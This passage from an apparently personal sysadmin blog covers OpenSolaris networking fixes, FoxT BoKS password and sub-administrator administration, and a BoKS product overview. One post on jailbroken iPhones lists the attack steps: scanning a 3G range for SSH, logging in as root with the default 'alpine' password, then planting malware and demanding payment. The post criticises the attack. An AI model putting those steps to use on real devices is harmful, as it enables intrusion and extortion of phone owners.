PATH=$PATH:/usr/sfw/bin

rm $driver/Makefile

ln -s $tmpdir/$driver/Makefile.amd64_gcc $tmpdir/$driver/Makefile

8. Save the file and run: ./network.sh

9. Answer the usual questions to configure the NIC. Then reboot.

I went with the second solution (might as well stay running in 64-bit mode now that I can). I can confirm that it works and that my NI interface is now back. You may find that network.sh configured the ni0 interface, while it's actually called ni1. Reconfigure if needed by moving /etc/hostname.ni0 to /etc/hostname.ni1.


kilala.nl tags: , , ,

View or add comments (curr. 3)

FoxT BoKS: changing a (root) user's password

2009-11-18 07:45:00

Speaking of over thinking things...

Recently I've been working on my script for the mass changing of root passwords, right? After working on it for a few days I've found three four five ways of changing a (root) user's password.

1. passwd $HOST:root

2. modbks -l $HOST:root -p "$ENCPASSWD"

3. boksauth -c FUNC=change_psw ... NEWPSW="$PASSWD"

4. boksauth -c FUNC=write TAB=1 ... +PSW="$ENCPASSWD"

5. restbase -s 1 ... $UPDATEFILE

Options 1 and 3 both use the plain text password string, where option 1 is obviously not useful for mass password changes because it's an interactive command. On the other hand options 2 and 4 both use the encrypted password string, thus creating the need for an encryption routine like Perl's "print crypt" method.
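
For completeness: generating such an encrypted password string from the shell is a one-liner with Perl's crypt(). A sketch (the password and salt are obviously placeholders):

perl -e 'print crypt("S0meNewPassw0rd", "Xy"), "\n"'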

Options 3 and 4 are kludges because you're using the "boksauth" command to send calls directly to the servc process as if you were a piece of BoKS client software.

Option 5 is just too nasty to consider. Using the "restbase" command you can restore or overwrite parts of the BoKS database from plain text files in the BoKS dump ("dumpbase") format. This means that you could technically speaking make an update file containing an edited entry for the user in question, containing the new encrypted password string in the PSW field.

In my script I originally used option 2, but was dissatisfied with it because it did not update the PSWLASTCHANGE field in table 1. This in turn was screwing up our SOx audits, because all of our root passwords were listed as being over a year old which obviously wasn't true. This is why I switched to using "boksauth" and option 3.

And that's where the over thinking comes into the story. I don't know why both I and the guys from FoxT didn't think of this, but let's check the "modbks" man-page:

-L days = Set password last change date back days days.

Hooray for reading comprehension! /o/

This means that by simply adding "-L 0" to my modbks command I could've reset the PSWLASTCHANGE field to today. And it works for both BoKS 6.0 and BoKS 6.5. How did I miss this? I think I just need to sit down and read all BoKS man-pages because who knows what else I can come up with? :)
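
In other words, option 2 with the missing piece bolted on looks like this ($ENCPASSWD would come from a crypt routine such as the Perl one-liner mentioned earlier; the hostname is just an example):

# Set the encrypted password AND reset PSWLASTCHANGE to today
modbks -l solaris2:root -p "$ENCPASSWD" -L 0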


kilala.nl tags: , ,

View or add comments (curr. 1)

FoxT BoKS: forcing a user to change his password

2009-11-18 07:19:00

Sometimes I think too far out of the box :)

I have always been up front about what I think about FoxT's BoKS security software: it's good stuff, but sometimes it's a bit kludgy. Today I learned that I shouldn't let this cloud my judgment too much because sometimes BoKS -does- do things elegantly ^_^;

A colleague of mine asked me the following question: Is it possible to force a user to change his password on the next login, -without- using the web interface?

Seems straightforward enough, right? However, in my clouded mindset I completely over thought the whole matter and started digging in the database. Table 1 of the BoKS database should contain the relevant information, but which field could it be? Two fields seem to stand out, but neither is related.

BoKS > dumpbase -t1 | grep ru13rs

RLOGNAME="SECURITY:thomas" UID="1000" GID="1000" PROFILE="SecuritySupport" REALNAME="Thomas Sluyter" HOMEDIR="thomas" USERLASTCHANGE="1224244960" FLAGS="16384" PSW="39ajnasdlfkj4" PSWLASTCHANGE="1256545622" NO_PWDF="0" SERIAL="" PSWKEY="6436" LASTTTY="servera:pts/17" LASTLOGIN="1258524725" LASTLOGOUT="1258465492" RETRY="0" RESERVED1="125196" RESERVED2="" LOGINVALIDTIME="0" PSWVALIDTIME="0" CHPSWTIME="0" PSWMINLEN="0" PSWFORCE="0" PSWHISTLEN="0" CHPSWFREQ="0" TIMEOUT="0" TTIMEOUT="0" TDAYS="0" TSTART="0" TEND="0" RETRYMAX="0" CONCUR_LOGINS="0" SHELL="/bin/ksh" PARAMETERMASK="16384" PSDPSW="" PSDPSWLASTCHANGE="0" PSDPSWRETRIES="0" PSDBLOCKED="0" PSDBLOCKEDTIME="0" FEK="" GEKVER="" MD5DN="" LASTDTLOGIN="0" SETTINGVER=""

I've no clue what the NO_PWDF field does, but at least it does NOT stand for "no password force" :) Also, the field PSWFORCE does indeed have something to do with the enforcing of passwords, but not with the forced changing thereof. Instead it defines which guidelines and rules a new password must adhere to (see page 262 of the BoKS 6.5 admin guide). In the end our friendly FoxT support engineer informed me that the value I was looking for is a hex code that's part of the FLAGS field.

However, that's not why I over thought things.

In his email the engineer also showed how he derived the appropriate hex value from the FLAGS field, which led to:

BoKS > man passwd

boksadm -S passwd [-f|-F] [-x debug level] [user]

-f This option forces the user to enter a new password on the next login. Valid for superuser only.

Duh!
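
So in practice the whole exercise boils down to a single command (assuming, per the synopsis above, that a plain username is accepted):

boksadm -S passwd -f thomas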

EDIT:

Obviously you can also use modbks -l $USER -L $DAYS to set the PSWLASTCHANGE field for the user back X amount of days past the PSWVALIDTIME. However, this isn't very practical since the PSWVALIDTIME field differs per user :)

You'd also be messing with information that could be important to a SOx audit, so you'd better not do it this way ;)


kilala.nl tags: , ,

View or add comments (curr. 0)

Unixerius is now official partner of FoxT

2009-11-05 07:08:00

FoxT's logo

I am proud to announce that my employer, Unixerius, is FoxT's official partner for the Benelux, starting in November 2009. We will be FoxT's preferred partner for the delivery of:

* BoKS Access Control licenses

* Pre-sales consulting

* After-sales consulting

* Implementation projects

* Daily management of BoKS infrastructures

* Training

It took us a year of lobbying, from planting the initial thought in my boss's head to getting the final signature on paper. I'm very glad that we finally managed to get the title and I'm very much looking forward to working with FoxT on improving both their market presence in the Netherlands and the product itself.


kilala.nl tags: , ,

View or add comments (curr. 1)

Obvious security hole in jail broken iPhones exploited

2009-11-02 17:02:00

Seriously, this was waiting to happen: Teenager "hacks" jail broken iPhones. The security hole is glaringly obvious and has been proven and verified by some of my security-expert acquaintances. And now, obviously, it's out in the open. Personally I wonder how the heck it took so long for this to happen.

The hole: jail broken iPhones often run an SSH daemon, allowing their owners access to the phone's operating system. Most of these owners unfortunately never change the default root password, thus giving anyone 100% access to their phones. I really don't understand why nobody has ever pushed this issue before.

The steps are painfully easy.

1. Do a port scan on T-Mobile's 3G IP range, looking for SSH servers.

2. Try to login as root using the default alpine password.

3. Install your root kit / malware / hostage message.

4. Ask that people send you five euros for the free "fix".

5. PROFIT!

The fix in question is also plainly, fscking obvious: change your root password (asshole)! The "hacker" in question says it's safe to just remove two files he installed and to change your password, but personally I'd do a completely clean wipe. There's no telling if anyone's left anything else as a present.

Some links:

* The topic at GoT that started it all.

* The news post at Tweakers.

* The original hostage website

* The "fix"

EDIT:

My pessimistic prediction for this week: the mainstream press will pick up on the story, misunderstand the issue and put the blame on Apple. Many geeks will try to defuse the situation and explain that the fault lies with people who were mucking with things they don't understand, but their pleas will fall on deaf ears.

EDIT 2:

So I was wrong in one regard: this exploit -has- both been abused and reported before. How about December 2008 and July 2008? So, the only thing all of this really proves is that people in general don't listen and they don't learn.


kilala.nl tags: , ,

View or add comments (curr. 5)

Problem: upgrading to Parallels 4 breaks OpenSolaris networking

2009-10-31 10:39:00

After my recent upgrade to Parallels Desktop 4 I've run into yet another issue. Apparently upgrading from PD3 to PD4 introduces some minor changes to the networking setup, which causes OpenSolaris' ni interfaces to break.

"Break" turns out to be a large word, but it's still an inconvenience. Apparently during the upgrade process the virtual PCI slots get shuffled a bit, leading to the ni1 interface getting renamed. Before the upgrade everything ran on interface ni0, which started complaining about problems right after the upgrade.

Here's some of my troubleshooting. First, on boot you'll see:

WARNING: ni1: niattach: SA_eeprom is funny, assuming byte-mode

Failed to plumb IPv4 interface(s): ni0

svc.startd[7]: svc:/network/physical:default: Method "/lib/svc/method/net-physical" failed with exit status 96.

svc.startd[7]: network/physical:default misconfigured: transitioned to maintenance (see 'svcs -xv' for details)

Checking the svcs output doesn't actually give me many hints, aside from the fact that interface ni0 cannot be found. Both prtdiag and prtconf seem to confirm this. I then checked the output of dmesg to see if there's anything useful in there. There was.

solaris2 ni: [ID 328865 kern.info] ni1: pci_regs[0]: 00002800.00000000.00000000.00000000.00000000

solaris2 ni: [ID 328865 kern.info] ni1: pci_regs[1]: 01002810.00000000.00000000.00000000.00000000

solaris2 ni: [ID 328865 kern.info] ni1: pci_regs[2]: 02002814.00000000.00000000.00000000.00000000

solaris2 ni: [ID 297787 kern.warning] WARNING: ni1: niattac: SA_eeprom is funny, assuming byte-mode

And so on... This confirms that the ni driver and interface are working. It also tells me that there's an interface ni1. ni0 only gets mentioned when Solaris tries to actually start TCP/IP on ni0, which as has been said is not present. By typing "ifconfig ni1 plumb" I've confirmed that the network card is now in fact called ni1.

Hypothesis:

During the upgrade to Parallels Desktop 4 the virtual PCI slots got shuffled, leading to a rename of the network interface.

Solution:

mv /etc/hostname.ni0 /etc/hostname.ni1

mv /etc/dhcp.ni0 /etc/dhcp.ni1


kilala.nl tags: ,

View or add comments (curr. 3)

Problem: upgrading to Parallels Desktop 4 with suspended VMs

2009-10-29 07:49:00

I recently upgraded my Macbook with OS X 10.6 without a hitch. However, I soon discovered that Parallels Desktop 3.x does not work with Snow Leopard, so I was kind of forced to upgrade Parallels as well. *shrug* Oh well...

The installation process of Parallels 4 requires that all virtual machines are shut down. They cannot be running, or suspended. Funny thing: how are you going to do that if you've already upgraded the OS and thus PD 3.x doesn't work anymore? Yeah ^_^;

I scoured the web to see if there was a command line trick to stop a suspended VM, but couldn't find one. In the end I had to boot from my backup hard drive, start PD3 from there and use it to shut down the VMs on my Macbook's drive. At least PD4 looks pretty sweet :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Bye bye Powermac o/

2009-10-28 22:23:00

A bit over half a year after putting my Powermac G5 to bed I've actually gone and sold her. A new member at the MacFreak fora was interested in buying a cheap Mac to get his feet wet after living on Windows all his life. He'd tried Linux, which wasn't "it", and now was curious about OS X. While the G5 is no powerhouse by today's standards it's still a very nice box for a beginner: G5 @1.6GHz with 1.5GB RAM and 200GB of hard drive space. I sold it for 220, which is a bit under the market price but it's definitely fair money for a six-year-old box.

Ah! I'll miss her a little bit. She was my very first Macintosh and she was definitely a woman after my tastes: reliable, gentle, nice to look at and built sturdily ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

Unix, BoKS and Nagios consulting

2009-10-25 18:28:00

I've been a Unix consultant in one form or another since the year 2000. Over those years I've gained expertise on the following subjects.

Thanks to the partnership between FoxT and my employer Unixerius I am an officially licensed BoKS consultant and trainer.

Other experience

Aside from my day-to-day Unix activities, I've also gained experience in the following fields:

Contacting me

I am currently employed by Unixerius, a small consulting firm in the Netherlands. We all specialize in one or two flavours of Unix and one or two additional fields (mine being monitoring and security). I am available for hire through Unixerius as I am not currently interested in going freelance.

You may also contact me directly.

For an overview of my work history, please visit my LinkedIn.com profile.


kilala.nl tags: , ,

View or add comments (curr. 0)

What is FoxT BoKS? A short introduction

2009-10-25 15:59:00

Boiling it down to one sentence, one can say that BoKS enables you to centrally manage user accounts and access permissions, based on Role Based Access Control (RBAC).

The following article is also available as a PDF.




What is FoxT BoKS?

BoKS Access Control is a product of the Swedish firm FoxT (Fox Technologies), intended for the centralized management of user authentication and authorization (Role Based Identity Management and Access Control). The name is an abbreviation of the Swedish "Behörighet- och KontrollSystem", which roughly translates as "Legitimacy and Control System".

Some key features of BoKS are:

Using BoKS you decide WHO gets to access WHICH servers and WHEN, WHAT they can do there and HOW.

BoKS is a standalone application and requires no modifications of the server or desktop operating systems.


An example: Role Based Access Control

BoKS groups user accounts and computer systems based on their function within the network and the company. Each user will fit one or more role descriptions and each server will be part of different logical host groups. One could say that BoKS is a technical representation of your company's organisation where everyone has a clearly defined role and purpose.

Let us discuss a very simple example, based on a BoKS server, an application server and a database server.

Your database admins will obviously need access to their own workstations. Aside from that they will be allowed to use SSH to access those servers in the network that run their Oracle database. Because BoKS is capable of filtering SSH subsystems, the DBAs will get access to the command line (normal SSH login) and to SCP file transfer. All other SSH functions (like port forwarding, X11 tunneling and such) will be turned off for their accounts. Using the BoKS Oracle plugins your DBAs' accounts will also be allowed to administer the actual databases running on the server.
The sysadmins will be allowed full SSH access from their work stations to all of the servers in the network. Aside from their own user accounts they will also be allowed to login using the superuser account, but that will be limited to each server's console to limit the actual risk of abuse. Because the system administrators are expected to provide 24x7 support they will also be allowed to create a VPN connection to the network, through which they can also use SSH. However, this particular SSH will only work if they have authenticated themselves using an RSA token.

To ensure a separation of duties the system administrators will not be allowed access to any of the applications or databases running on the servers.
The actual users of BoKS, security operations, will gain SSH access to the BoKS security server. Aside from that they will also be allowed access to the BoKS web interface, provided that they've identified themselves using their PKI smart card.

Key features of BoKS

Centralized management of user accounts
No longer will you have to locally create, modify or remove user accounts on your servers. BoKS will manage everything from its central security server(s), including SSH certificates, secondary Unix groups and personal home directories.

Centrally defined access rules
Users will only be allowed access to your computer systems based on the rules defined in the BoKS database. These rules define permissible source and destination systems, as well as the time of day and the communication protocols to be used.

Role based access control
Access rules can be assigned both to individual users and to roles. By defining these user classes you can create and apply a set of access rules for a whole team or department in one go. This will save you time and will also lower the risk of human error.

Extensive audit logging
Every authentication request that's handled by BoKS is stored in the audit logs. At all times you will be able to see what has happened in your network. BoKS also provides the possibility of logging every keystroke performed by a superuser (root) account, allowing you greater auditing capabilities.

Real-time monitoring
The BoKS auditing logs are updated and replicated in real-time. This allows you to use your existing monitoring infrastructure to monitor for undesired activities.

Support for most common network protocols
BoKS provides authentication and authorization for the following protocols: login, su, telnet, secure telnet, rlogin, XDM, PC-NFS, rsh and rexec, FTP and SSH. The SSH protocol can be further divided into ssh_sh (shell), ssh_exec (remote command execution), ssh_scp (SCP), ssh_sftp (SFTP), ssh_x11 (X11 forwarding), ssh_rfwd (remote port forwarding) and ssh_fwd (local port forwarding).

Delegated superuser access
Using "suexec" BoKS allows your users to run a specified set of commands using the superuser (root) account. Suexec access rules can be specified on both the command and the parameter level, allowing you great flexibility.

Integration with LDAP and NIS+
If so desired BoKS can be integrated into your existing directory services like LDAP and NIS+. This enables you to connect to automated Human Resources processes involving your users.

Redundant infrastructure
By using multiple BoKS servers per physical location you will be able to provide properly load balanced services. Your BoKS infrastructure will also remain operable despite any large disasters that may occur. Disaster recovery can be a matter of minutes.


Product comparison

OpenLDAP eTrust AC BoKS AC
Centralized authentication management Y Y Y
Centralized authorization management Y (1) Y Y
Role based access control N Y Y
SSH subsystem management N N Y
Monitoring of files and directories N Y Y
Access control on files and directories N Y N
Delegated superuser access Y (2) Y Y
Real-time security monitoring Y (3) Y Y
Extensive audit logging N Y Y
OS remains unchanged Y N Y
User-friendly configuration N Y Y
Reporting tools N Y Y
Password vault functionality N Y Y (4)

1: Only for SSH.
2: Using additional software.
3: Locally, using syslog.
4: Using the optional BoKS Password Manager module.


kilala.nl tags: , ,

View or add comments (curr. 11)

Dropbox made things a lot easier!

2009-10-25 08:41:00

Manga + Dropbox = ereader!

I've been thinking of solutions to reading manga on the road, usually opting to just bring a pocket book or two. However, now that I've started using Dropbox life's gotten a bit easier. No more need for one of those eBook readers with electronic ink and such, because my iPhone screen is -just- big enough to comfortably read comics. Hooray for the Dropbox iPhone app which gives me access to my DB share everywhere I can have 3G Internet access.

For those unaware what Dropbox is: it gives you 2GB of free online storage space which you can access from a web browser, an iPhone app, or using software for Mac, Windows or Linux. On the PC side of things your Dropbox will appear as a normal directory in your homedir. However, everything you put in that directory will automatically get synchronized to your online storage. This ensures that your files are accessible from all your computers and even when you're someplace else with a browser. Nice.


kilala.nl tags: , ,

View or add comments (curr. 0)

Upgraded to OS X Snow Leopard

2009-10-25 07:46:00

Screenshot of my Macbook with Snow Leopard (clickable)

Last week I finally got my mitts on our OS X Snow Leopard install disc. After properly backing up my Macbook and disabling the guest account (to ward off the horrible bug) the install went off without a hitch. I fell asleep on the couch while it was running, but I reckon it didn't take more than half an hour. Anywho, afterwards (as expected) everything seemed exactly the same because just about all the changes took place under the hood.

Inspired by some fellow Arsians I went and tinkered some more with Geektool. On my desktop I now have:

* Output from top for the six heaviest processes running.

* SMART status LED for my internal hard drive

* IP address info for Ethernet, Wi-Fi and my Internet connection.

* The time and date :)

* In Iron Man's hand:

** Status LED for charger cable

** Current charge percentage of the battery

** Status LED for charging process of battery

Also, here's the original file for the Iron Man background.
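For reference, the kind of one-liners such Geektool geeklets boil down to - just a sketch; the output formats of pmset and top vary a bit between OS X versions:

# Battery charge percentage (shell geeklet, refreshed every minute or so)
pmset -g batt | grep -o '[0-9]*%'

# Six heaviest processes by CPU usage
top -l 1 -o cpu -n 6 -stats pid,command,cpu | tail -n 6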


kilala.nl tags: ,

View or add comments (curr. 0)

What is FoxT BoKS? A short introduction

2009-10-20 07:36:00

Summarized in one sentence: BoKS makes it possible to manage user accounts and access rights from a central server, based on Role Based Access Control (RBAC).

The following article is also available as a PDF.




What is FoxT BoKS?

BoKS Access Control is a product of the Swedish firm FoxT, intended for the centralized management of user authentication and authorization (Role Based Identity Management and Access Control). The name is an abbreviation of the Swedish "Behörighet- och KontrollSystem", which roughly translates as "Legitimacy and Control System".

Key features of the package include:

Using BoKS you determine WHO gets access to WHICH servers and WHEN, WHAT they may do there and HOW.

BoKS is a standalone application and requires no modifications to the operating system of your servers and desktop systems.


A practical example: Role Based Access Control

In BoKS, users and computer systems are grouped based on their function within the network. Each user can hold one or more roles and each server is part of several host groups. The BoKS database is effectively a representation of the organisation chart, in which everyone fulfils their own role within the company.

As an example we take a network with a BoKS security server, an application server and a database server.

The database administrators get access to their own workstations. In addition, they are allowed to log in to their Oracle servers using SSH. Because BoKS is also able to filter on SSH subsystems, the DBAs get access to the command line and can copy files using SCP. They will, however, not be able to use X11 forwarding or SSH port forwarding. Using the BoKS Oracle plugin their user accounts are also created in Oracle itself, giving them full control over their databases.
The system administrators get SSH access from their workstations to all servers in the network. To perform their duties they get access to all SSH functions and may additionally log in on the console with the superuser account. Because the system administrators provide 24x7 support they may also log in over a VPN connection using SSH. However, they will only be allowed to do so after authenticating with an RSA token.

Because of the strict separation of duties the system administrators will not get access to the applications and databases running on the servers.
Security operations, the actual users of BoKS, get SSH access to the BoKS security server. They also get access to the BoKS web interface, provided they identify themselves with a smart card carrying a PKI certificate.

Key features of BoKS

Centralized management of user accounts
Creating, modifying and removing user accounts and related items no longer needs to be done locally. BoKS manages not only user accounts, but also SSH certificates, secondary Unix groups and home directories.

Centrally defined access rules
Users get access to systems based on access rules in the BoKS database. These rules place requirements on both the source and the destination system, the time of day and the protocol used.

Role based access control
Access rules can be assigned to individual users, but can also be tied to roles. This makes it possible to define a set of access rules per department, saving a lot of time and reducing risk.

Extensive audit logging
Every authorization request handled by BoKS is stored in the audit logs. This way you can see at all times what has happened in the network. It is also possible to enable keystroke logging for the superuser, so that a record is kept of which commands a user has executed.

Real-time monitoring capabilities
The BoKS audit logs are updated in real time, which makes it possible to attach alarms to specific situations using your monitoring tools.

Support for all common protocols
BoKS supports authentication and authorization control for the following protocols: login, su, telnet, secure telnet, rlogin, XDM, PC-NFS, rsh and rexec, FTP and SSH. The SSH protocol can be further split into ssh_sh (shell), ssh_exec (remote command execution), ssh_scp (SCP), ssh_sftp (SFTP), ssh_x11 (X11 forwarding), ssh_rfwd (remote port forwarding) and ssh_fwd (local port forwarding).

Delegated superuser access
Using BoKS' suexec functionality it becomes possible to give users very limited access to superuser accounts. The suexec access rules can specify, down to the parameter level, which commands may be executed as root.

Integration with LDAP and NIS+
If desired, BoKS can work together with directory services such as LDAP and NIS+. Among other things this makes it possible to hook into automated HR processes around employees joining and leaving the company.

Redundant infrastructure
Using multiple BoKS servers per physical location makes load balancing possible. During a catastrophe the BoKS infrastructure will remain available, and disaster recovery can be achieved within a reasonable amount of time.


Product comparison

OpenLDAP eTrust AC BoKS AC
Centralized user management Y Y Y
Centralized authorization management Y (1) Y Y
Role based access control N Y Y
SSH subsystem management N N Y
Monitoring of files N Y Y
Access control on files N Y N
Delegated superuser access Y (2) Y Y
Real-time security monitoring Y (3) Y Y
Extensive audit logging N Y Y
OS remains unchanged Y N Y
User-friendly configuration N Y Y
Reporting tools N Y Y
Password vault functionality N Y Y (4)

1: Only for SSH.
2: Using additional software.
3: Decentralized, using e.g. syslog.
4: Using the BoKS Password Manager module.


kilala.nl tags: , ,

View or add comments (curr. 0)

Computer parlance - the divide between geeks and users

2009-10-18 17:59:00

I try to help out people with computer/network questions on various online fora, like Tweakers and One more thing. One of the things that frequently leads to both confusion and frustration is the divide between the parlance of true geeks and normal users.

For example, take this thread where people discuss the ins and outs of the UPC broadband service. Many, many times will one see frustration arise between the lesser experienced members and the veritable geeks regarding the usage of m/M and bit/byte.

As in:

* m versus M = milli versus mega = 10^-3 versus 10^6

* bit versus byte = 1 bit versus 8 bits
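To make the difference concrete, a quick back-of-the-envelope conversion in plain shell (bc does the maths):

# 30 Mbit/s expressed in MB/s: divide by 8 bits per byte
echo "scale=2; 30 / 8" | bc        # 3.75 MB/s

# And the m-versus-M gap: 30 mbit/s would literally be 30 * 10^-3 bit/s
echo "scale=2; 30 * 0.001" | bc    # 0.03 bit/s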

Normal folks will happily mix their m's and their M's and their bits and their bytes, not caring about the meaning of either. They reason according to the famous adage "Do what I mean, not what I say". So you'll frequently see things like:

Until two days ago I could happily download at a well-deserved 30mbits, which today fell to a miserable 5mbits. Then I rebooted the modem and now it's back up to 3.5mbits, so I R happy.

Does that sound confusing to you? Because to every true IT geek out there it does! So now there are dozens of folks like me berating the people who keep mixing things up to "get it right, because you're not making sense". Of course we are then in turn labeled as nitpickers (or "comma fornicators", as the Dutch term would translate). The thing is, even though SI prefixes are second nature to every (IT) geek, it seems that most "normal" people don't know all of them.

Sure, they know their millis from their centis and their kilos from their decas, but I don't think anyone in primary or high school usually deals with megas or anything bigger. Pretty odd, since you'd imagine that science class would cover stuff like megawatts. A quick poll with Marli (who is otherwise a very intelligent AND computer-savvy person) supports this idea: she knows "m", but not "M", and doesn't know the difference between a bit and a byte.

Ah, what're you going to do? I don't think this is a divide we'll quickly bridge, unless we unify to a completely new unit for measuring network speeds :) Might I suggest the "fruble"?

EDIT:

Mind you, I didn't write this just to rant. As an aspiring teacher I actually -do- wonder how one would best work around such a problem. Verbally there isn't any ambiguity, because one would always say "mbit" or "megabit" in full. But in writing there's much room for laziness and confusion, as discussed above. So, what do you do as a teacher? Do you keep hammering your students to adhere to the proper standards? To me, that does seem to make the most sense.

EDIT 2:

*sigh* Then again, if even the supposed "professionals" can't get it right, who are we to complain. Right? =_=;

UPC doesn't know their bits from their bytes


kilala.nl tags: , , ,

View or add comments (curr. 5)

BoKS database tables - an overview

2009-10-08 08:54:00

Documentation on the actual contents and makeup of the BoKS database is sparse and hard to find. The BoKS system administrator's manual doesn't mention any details, nor does FoxT's website. This isn't very odd, because in general FoxT would not recommend that people muck about in the database. However in some cases it's very important to know what's what and how you can extract information. Case in point, my earlier database dump script for migrations.

In the past I've pieced together an overview of the various database tables, which is far from complete. I still need to update this list using some unofficial BoKS documentation, but below you'll find the summary as it stands now.

In the mean time you can find the unofficial documentation of the BoKS database tables by reading the following file on your BoKS master: $BOKS_lib/gui/tcl/base/boksdb.tcl

 

BoKS database tables

#   Contents                              #   Contents
0   System parameters                     27  -
1   User accounts                         28  -
2   User access routes                    29  -
3   -                                     30  -
4   SSH authentication methods            31  User SSH authenticators
5   Currently logged-in users             32  -
6   Hosts                                 33  ? don't know yet ?
7   Host group -> host                    34  Certificates for HTTPS et al
8   ? don't know yet ?                    35  -
9   Host -> host group                    36  -
10  -                                     37  Suexec program groups AND(!) LDAP server names
11  ? don't know yet ?                    38  ? don't know yet ?
12  -                                     39  -
13  -                                     40  -
14  Certificates for HTTPS et al          41  Server virtual cards ?
15  IP address -> host                    42  -
16  User class access routes              43  -
17  User classes                          44  BoKS users -> LDAP entries
18  -                                     45  -
19  -                                     46  -
20  Log rotation settings, see logadm     47  Unix group -> GID
21  -                                     48  User -> GID
22  Seccheck and filmon settings          49  User -> user class
23  LDAP bind settings                    50  -
24  -                                     51  -
25  Password complexity settings          52  -
26  -                                     53  -
                                          54  -

 

BoKS database interconnections diagram

BoKS database tables diagram

 

BoKS database relational schema

BoKS database relational schema

My colleagues Erik Bleeker and Patryck Winkelmolen have created a lovely Visio diagram of the BoKS database, its tables and fields and the relations between all of these. It took them quite a while to complete the puzzle, so they should be proud of their work! Lucky for us they were friendly enough to share the drawing with the rest of the world. I've included the Visio schematic over here with their permission.


kilala.nl tags: , ,

View or add comments (curr. 0)

Open Coffee Almere, still fun and enjoyable

2009-10-01 18:47:00

Today's the first Thursday of the month, which means that it was time for another installment of Open Coffee Almere. It was our fifth get-together and I was glad to see about a dozen people show up. There were two other regulars, but the rest of 'em were all new faces. One attendee even came down from the Leiden area!

I enjoyed myself tremendously and got to meet a few interesting people. The aforementioned gentleman does something really cool: he provides clinics where he combines lectures on champagne (the drink) with a certain message that management wants to convey to their colleagues. Say for example that a company would like to Go Green! (as they say). He would start the usual clinic about champagne and its many intricacies and then veer off towards ecological farming and how there's an analogy with what the company would like to achieve. I'm making a mess of explaining it, but it's really pretty cool -> Champagne Experience.

Today was the first time we'd gathered at the Tante Truus lunch room in town. I had no idea what to expect, so I was pleasantly surprised. The decor is lovely, the pie's great and the coffee awesome (they include a glass of water and a smidge of Baileys plus whipped cream with every coffee). I'd heartily recommend Truus for lunch or a break in the Almere Stad area.


kilala.nl tags: ,

View or add comments (curr. 3)

Making managing BoKS sub-administrators easier

2009-09-28 10:23:00

BoKS' administrative GUI is far from a work of art, at least in the versions I've worked with (up to and including 6.5.3). The web interface feels kludgy and it's apparent that it was designed almost ten years ago. I'm aware that FoxT are working on a completely new Java-driven GUI, so I'm very curious to see how that turns out!

In the mean time I've asked them to look at a GUI improvement that they might not have thought of before: the management of sub-administrators.


How do sub-administrators work?

In BoKS one can opt to delegate certain administrative tasks to other departments. For example, one could delegate the creation of simple Unix user accounts to the help desk in order to free up time for the 2nd and 3rd lines of support to do "important" things. In BoKS people with delegated access are called sub-administrators. It's important to remember that -everybody- with the "BOKSADM" access route gets full access to the BoKS web interface, unless they're defined as sub-admins.

According to the BoKS manual the following tasks can and cannot be delegated.


CAN be delegated:
  User Administration
  Access Control (partial)
  Host Administration (partial)
  Virtual Card Administration
  Encryption Key Administration (partial)
  Log Administration
  Integrity Check
  File Monitoring
  Database Backup
  User Inactivity Monitoring

CANNOT be delegated:
  Host Administration (partial)
  LDAP Synchronization
  Password Administration
  UNIX Groups Administration
  Sub-Administrator Configuration
  BoKS Agent Configuration
  Authenticator Administration
  CA Administration

Within each section it's possible to further limit the administrative rights. For example, if you allow your help desk to create simple Unix accounts you may want to limit them to a certain number of user classes, host groups or UID ranges. This can be done, but it's quite a hassle: you will need to configure each user separately. Frankly, doing this through the web interface sucks, especially if you have a huge list of user classes and want to include/exclude large numbers of classes.

Luckily there is a way to make things a -little- easier for yourself.


What happens under the hood? Configuration files galore!

I found out that all sub-administrator configuration is held on the file system and NOT in the BoKS database. I found this a bit odd, as it seems logical to keep stuff like this in the DB. This is also why I issued my original feature request: to bind sub-admin rights to BoKS user classes. But no, for now (BoKS 6.5.3 and lower) this config is held in $BOKS_var/subadm.

After enabling sub-administrator access for a particular user BoKS will create a new file in this directory, called $HOSTGROUP:$USERNAME.cfg thus binding it to a specific account. Browsing through this file I discovered how the access limitations work and to be honest: IMNSHO it's a kludge. For each particular section of the BoKS interface you will find a function (TCL subroutine?) that looks something like this:

boks_subadmin_check_$SECTION {
if "getlist" { return "ENTRY1 ENTRY2 ENTRY3 ... ENTRYn" }
if "changeitem matches ENTRY1 || ENTRY2 || ENTRY3 || ... || ENTRYn" { return 1 }
}

That's right, the configuration file actually contains subroutines that return a 0 or a 1 depending on which access rights you've given the user. If you've given him access to a hundred user classes there will be a subroutine with an IF-statement that has a hundred || OR-statements. Ouch. I've said it before and I'll say it again: it's time for a proper (relational) database.


Work around: making sub-administrator templates for BoKS

The way to make managing sub-administrators easier is not very user-friendly, but it's surprisingly easy.

  1. Convert one team member to sub-admin.
  2. Configure this one person through the web interface.
  3. Login to the BoKS master server and become root.
  4. Go into $BOKS_var/subadm.
  5. Copy $HOSTGROUP:$USERNAME.cfg to $USERCLASS.template, then chmod 644.
  6. for USER in $(classadm -L -u $USERCLASS); do cp -p $USERCLASS.template $USER.cfg; done

Done!

Obviously you'll want to copy $BOKS_var/subadm to all your replica servers as well. If you don't you'll give -everyone- with a "BOKSADM" access route full access to the GUI. I suggest setting up an rsync for this.
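A minimal sketch of such an rsync, assuming the default /var/opt/boksm path, passwordless SSH from the master to the replicas, and placeholder replica names:

#!/bin/ksh
# Push the sub-administrator configs from the master to every replica.
for REPLICA in replica1 replica2; do
    rsync -av -e ssh --delete /var/opt/boksm/subadm/ ${REPLICA}:/var/opt/boksm/subadm/
done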


One final, very big "gotcha!"

My colleague Wim realized that the current way of sub-admin delegation has one very big flaw. Every time you add a new host group or user class you will need to update all .CFG files to match this. Of course, using the aforementioned templates will make this easier because you can update one file and then copy it to the whole team. But still...


kilala.nl tags: , ,

View or add comments (curr. 1)

Converting Unix epoch time to other formats

2009-09-25 09:37:00

The Epoch Converter website is truly a handy resource! Anything you'd ever want to do with epoch dates gathered onto one easy to read/browse page. Awesome!

It's got information for many different operating systems and programming languages so you're never lost. *bookmark*
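A few one-liners for the most common conversions - a sketch; GNU and BSD date use different flags, older Solaris date lacks %s, and the timestamp below is just an arbitrary example:

# Current time as Unix epoch (Linux and BSD/OS X)
date +%s

# Epoch to human-readable, GNU date (Linux)
date -d @1253864220

# Epoch to human-readable, BSD date (OS X)
date -r 1253864220

# Or do it in Perl, which works pretty much everywhere
perl -le 'print scalar localtime(1253864220)'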


kilala.nl tags: , ,

View or add comments (curr. 0)

Submitted a bugfix to fix a BoKS bugfix

2009-09-24 10:17:00

